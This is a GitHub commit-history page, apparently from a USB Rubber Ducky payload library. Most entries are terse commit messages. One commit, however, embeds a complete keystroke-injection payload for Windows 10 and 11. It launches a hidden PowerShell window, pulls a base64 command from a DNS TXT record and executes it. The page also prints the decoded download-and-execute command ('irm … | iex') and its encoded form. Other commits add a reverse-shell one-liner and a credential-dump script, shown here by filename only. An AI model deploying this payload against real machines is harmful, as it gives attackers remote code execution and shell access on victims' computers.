Commit Graph

1215 Commits (ae0d976dce9900bf7411259fd3ac4d033124fb2b)

Author SHA1 Message Date
Nate ae0d976dce
Update README.md
fixed formatting
2024-08-04 18:01:10 -05:00
Nate 7658b87ce0
Update README.md
fixed readme formatting
2024-08-04 18:00:29 -05:00
Nate abd0a09360
Create README.md
Updated to reflect requested changes from pull request.
2024-08-04 17:58:09 -05:00
Nate c8e0ac280b
Delete payloads/library/execution/DNS-TXT-CommandInjection directory
deleting and removing files from requested changes in Pull request
2024-08-04 14:29:33 -05:00
Nate 1fd0843049
Delete payloads/library/execution/DNS-TXT-CommandInection directory
misspelled injection, deleting the directory, all content has been moved to DNS-TXT-CommandInjection direcotory
2024-08-04 10:46:16 -05:00
Nate 7c989706cc
Update DNS-TXT-CommandInjection.txt
updated folder, misspelled injection and update link to ConvertBase64.ps1
2024-08-04 10:41:20 -05:00
Nate c1608976d9
Update README.md
updated folder, misspelled injection and updated link to ConvertBase64.ps1
2024-08-04 10:38:54 -05:00
Nate 072a5dbc8a
Create ConvertBase64.ps1
updated folder, misspelled injection
2024-08-04 10:37:16 -05:00
Nate cea9eb46ef
Create powershellReverseShellOne-liner.ps1
updated folder, misspelled commandInjection
2024-08-04 10:35:42 -05:00
Nate e985ed3a61
Create T1.txt
updated folder, misspelled injection
2024-08-04 10:34:32 -05:00
Nate 3b8a1d9ec5
Create README.md
updating to new folder, misspelled injection
2024-08-04 10:33:19 -05:00
Nate c832c1868c
Create DNS-TXT-CommandInjection.txt
misspelled Injection in file name
2024-08-04 10:31:39 -05:00
Nate 867b15eb6d
Create .gitignore
misspelled folder
2024-08-04 10:29:45 -05:00
Nate 054f81e077
Update DNS-TXT-CommandInection.txt
misspelled injection
2024-08-04 10:24:30 -05:00
Nate e4cbee78f1
Update README.md
misspelled injection
2024-08-04 10:23:43 -05:00
Nate 2782d874c9
Update README.md 2024-08-03 23:50:18 -05:00
Nate ada8bf9ea7
Update DNS-TXT-CommandInection.txt 2024-08-03 23:47:09 -05:00
Nate 13355e8519
Update README.md 2024-08-03 23:43:50 -05:00
Nate fc745db314
Update README.md 2024-08-03 23:40:57 -05:00
Nate b4978b7b47
Update DNS-TXT-CommandInection.txt 2024-08-03 23:37:33 -05:00
Nate 1db132c3ac
Update README.md 2024-08-03 23:36:21 -05:00
Nate 902412339b
Update DNS-TXT-CommandInection.txt 2024-08-03 23:35:02 -05:00
Nate 7a36e6324a
Update powershellReverseShellOne-liner.ps1 2024-08-03 23:33:41 -05:00
Nate dad3d550fe
Create DNS-TXT-CommandInection.txt
REM     Title: DNS-TXT-CommandInection
REM     Author: Nate
REM     Description: A usb rubber ducky payload that leverages DNS TXT records to perform command injection.
REM     Windows Powershell is the CLI used by the payload. Replace the DNS TXT record for your domain with
REM     the base64 encoded payload you have. See README.md for more details on converting your payload to base64
REM 	and an example of creating your DNS TXT record in AWS Route53 service.
REM     Target: Windows 10, 11
REM     Props: Hak5, Darren Kitchen, Korben
REM     Version: 1.0
REM     Category: Execution

REM     CONFIGURATION
REM     REQUIRED A domain with the ability to manipulate the DNS TXT records.
REM     REQUIRED Web Server hosting the payload. In this example, python3 http.server was used to host a 
REM     reverseshell.
REM     REQUIRED - Provide URL used for Example
DEFINE  #MY_TARGET_URL example.com
REM     Example: powershell /w 1 $a=(resolve-dnsname MY_TARGET_URL TXT).strings;powershell -e $a
REM     Example of Decoded payload: "irm http://MY_TARGET_URL/T1.txt | iex"

REM     NOTES: No base64 can be used as an alternative by replacing "$a=",";powershell -e $a" with just "|iex"
REM     for the STRING payload below. Examples of the decoded command and encoded command are shown below to put 
REM     into DNS TXT record.
REM     Decoded: "irm http://MY_TARGET_URL/T1.txt | iex"
REM     Encoded: "aQByAG0AIABoAHQAdABwADoALwAvAGUAeABhAG0AcABsAGUALgBjAG8AbQAvAFQAMQAuAHQAeAB0ACAAfAAgAGkAZQB4AA=="

REM     ShoutOut: powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok. See link below.
REM     https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3
REM     The link below has the Powershell script to convert your payloads to Base64.
REM     https://	

DELAY 1000 
GUI r
DELAY 1000
STRING powershell /w 1 $a=(resolve-dnsname MY_TARGET_URL TXT).strings;powershell -e $a
DELAY 500
ENTER
2024-08-03 23:32:09 -05:00
Nate 571e2e6e33
Create T1.txt 2024-08-03 23:30:46 -05:00
Nate 3578034173
Create powershellReverseShellOne-liner.ps1 2024-08-03 23:30:02 -05:00
Nate b31e55d14a
Create convertBase64.ps1 2024-08-03 23:29:01 -05:00
Nate 784e37b063
Create README.md 2024-08-03 23:27:09 -05:00
Nate 460c95f5df
Update .gitignore 2024-08-03 21:19:44 -05:00
Nate b1999a0e7e
Create .gitignore
.gitignore as a placeholder
2024-08-03 21:17:34 -05:00
Peaks 3b30121b9e
Merge pull request #467 from nic005-arch/master
DUCKY-Harvest
2024-07-24 16:21:42 -04:00
Nicolo’ c5fe32cf05
Update payload.txt 2024-07-24 22:12:43 +02:00
Nicolo’ 8754d6eab4
Update sy_cred.ps1 2024-07-24 21:23:43 +02:00
Nicolo’ 791133a14e
Update README.md 2024-07-24 21:23:04 +02:00
Nicolo’ dc4ccd1874
Update README.md 2024-07-24 21:22:14 +02:00
Nicolo’ 7972203c71
Update README.md 2024-07-24 21:18:14 +02:00
Nicolo’ 10b6ea2f0e
Update sy_cred.ps1 2024-07-24 21:15:49 +02:00
Nicolo’ 3dc6750316
Update payload.txt 2024-07-24 21:14:16 +02:00
Nicolo’ fcc1caf610
Update sy_cred.ps1 2024-07-24 19:58:46 +02:00
Nicolo’ 5f7db5486a
Delete cred-dump/sysa2.ps1 2024-07-24 19:52:22 +02:00
Nicolo’ d68bf2967f
Update payload.txt 2024-07-24 19:52:11 +02:00
Nicolo’ c231b242cb
Create sy_cred.ps1 2024-07-24 19:51:53 +02:00
Nicolo’ 74e1bf5bf3
Delete cred-dump/paylode.txt 2024-07-24 19:50:41 +02:00
Nicolo’ ab486b9b9f
Create payload.txt 2024-07-24 19:50:19 +02:00
Nicolo’ 4f1ae9c312
Create README.md 2024-07-24 19:47:41 +02:00
Nicolo’ f8587e6006
Delete cred-dump/README.md 2024-07-24 19:44:02 +02:00
Nicolo’ 87f6b3d780
Update README.md 2024-07-24 16:23:07 +02:00
Nicolo’ 4f92998fb9
Update README.md 2024-07-24 16:22:34 +02:00
Nicolo’ b92530bfca
Update README.md 2024-07-24 14:28:02 +02:00
Nicolo’ f84b6730e3
Update sysa2.ps1 2024-07-24 14:25:51 +02:00